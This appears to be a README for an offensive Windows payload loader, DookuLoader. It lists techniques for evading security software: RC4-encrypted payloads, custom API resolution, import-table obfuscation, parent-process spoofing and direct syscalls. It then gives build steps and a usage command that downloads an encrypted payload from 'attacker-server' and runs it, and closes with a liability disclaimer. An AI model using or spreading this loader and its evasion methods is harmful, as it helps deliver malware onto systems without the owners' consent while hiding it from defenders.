- RC4 Encryption: Employs the RC4 decryption algorithm to encrypted payloads, making them harder to detect in memory.
- Custom WinAPI Functions: Custom implementations of GetProcAddress and GetModuleHandle functions, with string stacks.
- IAT Obfuscation: Employs Import Address Table (IAT) obfuscation techniques to evade detection.
- PPID Spoofing: Hides execution trace by spoofing the Parent Process ID (PPID) of the injected process.
- Direct Syscalls: Leverages direct syscalls to bypass WinAPI hooks and interact with the Windows kernel directly.
git clone https://github.com/rottaj/DookuLoader.git
cd DookuLoader
make;
.\dooku.exe -url "http://attacker-server/rc4-encrypted-payload.bin"
.\dooku.exe -encrypt "raw-payload.bin"
The author of this tool is not responsible for any misuse or damages caused.
Note: The use of this tool for malicious purposes is illegal and unethical. Always ensure that you have explicit permission to use this tool in any environment.